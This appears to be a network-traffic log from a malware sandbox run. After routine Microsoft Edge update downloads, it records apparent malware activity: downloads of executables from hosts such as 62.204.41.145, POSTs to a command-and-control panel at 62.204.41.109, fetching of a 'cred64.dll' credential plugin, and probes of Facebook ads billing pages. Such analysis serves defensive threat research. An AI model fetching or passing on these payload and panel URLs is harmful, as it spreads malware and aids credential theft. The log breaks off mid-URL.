HEADhttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3dRemote address:8.247.211.254:80RequestHEAD /filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-chrome-extension
Content-Length: 387365
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "ejzJ/waEWtSIdrro4H29ioyHSrY="
Last-Modified: Thu, 10 Mar 2022 05:56:35 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: dfab9e8d-4243-4c2a-978c-045fd757853b
MS-CV: O9FRpwV5/Ui2sQWe.0
MS-RequestId: 67e86195-fb38-4099-9a54-128438c843de
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 18011144E050413488CCD2EAAC24D4FF Ref B: DM2EDGE0621 Ref C: 2022-03-10T06:01:46Z
X-MSEdge-Ref: Ref A: 1475C4A29D164823BDE8F0DC59A3EC2C Ref B: STBEDGE0120 Ref C: 2022-03-10T06:01:47Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Fri, 14 Apr 2023 06:04:41 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8272930
Accept-Ranges: bytes
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 10 Mar 2022 05:56:35 GMT
Range: bytes=0-60015
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 60016
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "ejzJ/waEWtSIdrro4H29ioyHSrY="
Last-Modified: Thu, 10 Mar 2022 05:56:35 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: dfab9e8d-4243-4c2a-978c-045fd757853b
MS-CV: O9FRpwV5/Ui2sQWe.0
MS-RequestId: 67e86195-fb38-4099-9a54-128438c843de
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 18011144E050413488CCD2EAAC24D4FF Ref B: DM2EDGE0621 Ref C: 2022-03-10T06:01:46Z
X-MSEdge-Ref: Ref A: 1475C4A29D164823BDE8F0DC59A3EC2C Ref B: STBEDGE0120 Ref C: 2022-03-10T06:01:47Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Fri, 14 Apr 2023 06:04:41 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8272930
Content-Range: bytes 0-60015/387365
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 10 Mar 2022 05:56:35 GMT
Range: bytes=60016-180361
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 120346
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "ejzJ/waEWtSIdrro4H29ioyHSrY="
Last-Modified: Thu, 10 Mar 2022 05:56:35 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: dfab9e8d-4243-4c2a-978c-045fd757853b
MS-CV: O9FRpwV5/Ui2sQWe.0
MS-RequestId: 67e86195-fb38-4099-9a54-128438c843de
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 18011144E050413488CCD2EAAC24D4FF Ref B: DM2EDGE0621 Ref C: 2022-03-10T06:01:46Z
X-MSEdge-Ref: Ref A: 1475C4A29D164823BDE8F0DC59A3EC2C Ref B: STBEDGE0120 Ref C: 2022-03-10T06:01:47Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Fri, 14 Apr 2023 06:04:41 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8272931
Content-Range: bytes 60016-180361/387365
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/f08b21db-8a96-416f-86dc-4301cb9925a1?P1=1672731919&P2=404&P3=2&P4=INYbfU2wmFzgLBIhz6%2b2jV68scVuShcvY5LszT5wOmkQLKkA6OkbtmIlRcw99%2b52hwPjpMP%2bv21FWhbjAB9XIQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 10 Mar 2022 05:56:35 GMT
Range: bytes=180362-387364
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 207003
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "ejzJ/waEWtSIdrro4H29ioyHSrY="
Last-Modified: Thu, 10 Mar 2022 05:56:35 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: dfab9e8d-4243-4c2a-978c-045fd757853b
MS-CV: O9FRpwV5/Ui2sQWe.0
MS-RequestId: 67e86195-fb38-4099-9a54-128438c843de
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 18011144E050413488CCD2EAAC24D4FF Ref B: DM2EDGE0621 Ref C: 2022-03-10T06:01:46Z
X-MSEdge-Ref: Ref A: 1475C4A29D164823BDE8F0DC59A3EC2C Ref B: STBEDGE0120 Ref C: 2022-03-10T06:01:47Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Fri, 14 Apr 2023 06:04:41 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8272932
Content-Range: bytes 180362-387364/387365
-
HEADhttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/dde93974-5cbc-4ecc-898f-436e62207c34?P1=1672731965&P2=404&P3=2&P4=byorAsFZBRad%2fhgfHzzxriLoDnWwhETip5dDq6erYcCz6eCyikS%2fxUj8BZZ%2b%2bTYrWYqlwzgjXMe%2fvdchKF0CAw%3d%3dRemote address:8.247.211.254:80RequestHEAD /filestreamingservice/files/dde93974-5cbc-4ecc-898f-436e62207c34?P1=1672731965&P2=404&P3=2&P4=byorAsFZBRad%2fhgfHzzxriLoDnWwhETip5dDq6erYcCz6eCyikS%2fxUj8BZZ%2b%2bTYrWYqlwzgjXMe%2fvdchKF0CAw%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-chrome-extension
Content-Length: 37885
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "oMKaVKY4R4aAEBNIzSU/PyNpsKo="
Last-Modified: Thu, 11 Nov 2021 00:13:10 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: d3fa35ac-2e20-4605-a87d-ed9239943b81
MS-CV: s9ea1eVOikiZR+8o.0
MS-RequestId: c49a955f-43f7-43cd-9305-f6bfc945e618
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A978F2A1921C4FB2AEDB0A3CF5FB6A47 Ref B: BLUEDGE1221 Ref C: 2021-11-11T00:24:35Z
X-MSEdge-Ref: Ref A: 83DEED2BEA2041A7B00FCC5C77BFAC06 Ref B: ATL331000101017 Ref C: 2021-11-11T00:24:36Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Sun, 16 Jul 2023 03:56:42 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 1246194
Accept-Ranges: bytes
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/dde93974-5cbc-4ecc-898f-436e62207c34?P1=1672731965&P2=404&P3=2&P4=byorAsFZBRad%2fhgfHzzxriLoDnWwhETip5dDq6erYcCz6eCyikS%2fxUj8BZZ%2b%2bTYrWYqlwzgjXMe%2fvdchKF0CAw%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/dde93974-5cbc-4ecc-898f-436e62207c34?P1=1672731965&P2=404&P3=2&P4=byorAsFZBRad%2fhgfHzzxriLoDnWwhETip5dDq6erYcCz6eCyikS%2fxUj8BZZ%2b%2bTYrWYqlwzgjXMe%2fvdchKF0CAw%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 11 Nov 2021 00:13:10 GMT
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-chrome-extension
Content-Length: 37885
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "oMKaVKY4R4aAEBNIzSU/PyNpsKo="
Last-Modified: Thu, 11 Nov 2021 00:13:10 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: d3fa35ac-2e20-4605-a87d-ed9239943b81
MS-CV: s9ea1eVOikiZR+8o.0
MS-RequestId: c49a955f-43f7-43cd-9305-f6bfc945e618
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A978F2A1921C4FB2AEDB0A3CF5FB6A47 Ref B: BLUEDGE1221 Ref C: 2021-11-11T00:24:35Z
X-MSEdge-Ref: Ref A: 83DEED2BEA2041A7B00FCC5C77BFAC06 Ref B: ATL331000101017 Ref C: 2021-11-11T00:24:36Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Sun, 16 Jul 2023 03:56:42 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 1246194
Accept-Ranges: bytes
-
HEADhttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3dRemote address:8.247.211.254:80RequestHEAD /filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-chrome-extension
Content-Length: 975576
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "wehJBmKQPZDel3YMsxAkJvJ4S9k="
Last-Modified: Tue, 08 Mar 2022 02:44:10 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: a5489490-4855-468d-921d-bc763d6052b5
MS-CV: vlq0H3anCkSz2TJC.0
MS-RequestId: e1010925-78dc-4280-9c28-6abf781ae28d
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 5ED5C73D01C54ED5BB936BF918C5656E Ref B: DM2EDGE1008 Ref C: 2022-03-08T02:54:19Z
X-MSEdge-Ref: Ref A: 2B08AEA1482249989C5A086621E9F860 Ref B: WSTEDGE1013 Ref C: 2022-03-08T02:54:20Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Wed, 12 Apr 2023 03:08:16 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8456336
Accept-Ranges: bytes
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 08 Mar 2022 02:44:10 GMT
Range: bytes=0-784659
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 784660
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "wehJBmKQPZDel3YMsxAkJvJ4S9k="
Last-Modified: Tue, 08 Mar 2022 02:44:10 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: a5489490-4855-468d-921d-bc763d6052b5
MS-CV: vlq0H3anCkSz2TJC.0
MS-RequestId: e1010925-78dc-4280-9c28-6abf781ae28d
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 5ED5C73D01C54ED5BB936BF918C5656E Ref B: DM2EDGE1008 Ref C: 2022-03-08T02:54:19Z
X-MSEdge-Ref: Ref A: 2B08AEA1482249989C5A086621E9F860 Ref B: WSTEDGE1013 Ref C: 2022-03-08T02:54:20Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Wed, 12 Apr 2023 03:08:16 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8456336
Content-Range: bytes 0-784659/975576
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/2132f61f-f790-4ae6-a355-8cf9a1533800?P1=1672731919&P2=404&P3=2&P4=TTNabU0q7iDVgpqongWgJWIL5iBxp000bPoCPJBIK2nBb06u3p0YzB2AjE4%2b3QrmzusCahdP6A6b0R%2bAzTU9kQ%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 08 Mar 2022 02:44:10 GMT
Range: bytes=784660-975575
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 190916
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "wehJBmKQPZDel3YMsxAkJvJ4S9k="
Last-Modified: Tue, 08 Mar 2022 02:44:10 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: a5489490-4855-468d-921d-bc763d6052b5
MS-CV: vlq0H3anCkSz2TJC.0
MS-RequestId: e1010925-78dc-4280-9c28-6abf781ae28d
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: 5ED5C73D01C54ED5BB936BF918C5656E Ref B: DM2EDGE1008 Ref C: 2022-03-08T02:54:19Z
X-MSEdge-Ref: Ref A: 2B08AEA1482249989C5A086621E9F860 Ref B: WSTEDGE1013 Ref C: 2022-03-08T02:54:20Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Wed, 12 Apr 2023 03:08:16 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 8456337
Content-Range: bytes 784660-975575/975576
-
Remote address:84.53.175.65:443RequestOPTIONS /api/report?cat=msn HTTP/1.1
Host: deff.nelreports.net
Connection: keep-alive
Origin: https://assets.msn.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Headers: content-type
Date: Sat, 31 Dec 2022 00:06:37 GMT
Connection: keep-alive
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: *
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
-
Remote address:84.53.175.65:443RequestPOST /api/report?cat=msn HTTP/1.1
Host: deff.nelreports.net
Connection: keep-alive
Content-Length: 484
Content-Type: application/reports+json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Date: Sat, 31 Dec 2022 00:06:37 GMT
Connection: keep-alive
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: *
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
-
322 B 7
-
144.2kB 7.1MB 2824 5228
HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404HTTP Request
POST http://potunulit.org/HTTP Response
404 -
5.2kB 248.2kB 104 182
HTTP Request
GET http://62.204.41.145/fusa/bibar.exeHTTP Response
200 -
6.0kB 310.7kB 121 230
HTTP Request
GET https://polyzi.com/systems/ChromeSetup.exeHTTP Response
200 -
34.6kB 2.0MB 742 1462
HTTP Request
GET https://www.isurucabs.lk/3003.exeHTTP Response
200 -
1.1kB 8.2kB 16 12
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
7.7kB 136.4kB 122 112
HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
POST http://62.204.41.109/Nmkn5d9Dn/index.phpHTTP Response
200HTTP Request
GET http://62.204.41.109/Nmkn5d9Dn/Plugins/cred64.dllHTTP Response
200 -
114.6kB 3.4MB 2469 2465
HTTP Request
GET http://62.204.41.145/romka/chum.exeHTTP Response
200HTTP Request
GET http://62.204.41.145/joka/portu1.exeHTTP Response
200HTTP Request
GET http://62.204.41.145/new/linda5.exeHTTP Response
200HTTP Request
GET http://62.204.41.145/ano/anon.exeHTTP Response
200HTTP Request
GET http://62.204.41.145/bosko/leman.exeHTTP Response
200HTTP Request
GET http://62.204.41.145/ano/clim.exeHTTP Response
200 -
95.6kB 3.8MB 1682 2709
HTTP Request
GET https://llo.eiwagggg.com/files/lll/llpb1135.exeHTTP Response
200 -
92.2kB 7.6kB 92 37
-
157.240.247.35:443https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingtls, httpD5F9.exe4.5kB 116.3kB 53 93
HTTP Request
GET https://www.facebook.com/ads/manager/account_settings/account_billingHTTP Response
302HTTP Request
GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingHTTP Response
200 -
157.240.247.35:443https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingtls, httpE5E8.exe4.5kB 116.2kB 53 93
HTTP Request
GET https://www.facebook.com/ads/manager/account_settings/account_billingHTTP Response
302HTTP Request
GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingHTTP Response
200 -
45.66.159.18:80http://aaa.apiaaaeg.com/check/?sid=106129&key=e1200dbbb37be638d594fb40984fb5c7httpD5F9.exe1.2kB 901 B 9 8
HTTP Request
GET http://aaa.apiaaaeg.com/check/safeHTTP Response
200HTTP Request
POST http://aaa.apiaaaeg.com/check/?sid=106129&key=e1200dbbb37be638d594fb40984fb5c7HTTP Response
200 -
77.5kB 7.8kB 81 42
-
45.66.159.18:80http://aaa.apiaaaeg.com/check/?sid=106141&key=f2f97d5ca5337e374b368257576bb952httpE5E8.exe1.2kB 901 B 9 8
HTTP Request
GET http://aaa.apiaaaeg.com/check/safeHTTP Response
200HTTP Request
POST http://aaa.apiaaaeg.com/check/?sid=106141&key=f2f97d5ca5337e374b368257576bb952HTTP Response
200 -
20.86.249.62:443https://nav.smartscreen.microsoft.com/api/browser/edge/actionstls, httpmsedge.exe2.7kB 12.2kB 14 14
HTTP Request
POST https://nav.smartscreen.microsoft.com/api/browser/edge/actionsHTTP Response
200 -
20.82.250.189:443https://smartscreen-prod.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7Dtls, httpmsedge.exe13.0kB 483.7kB 184 352
HTTP Request
GET https://smartscreen-prod.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%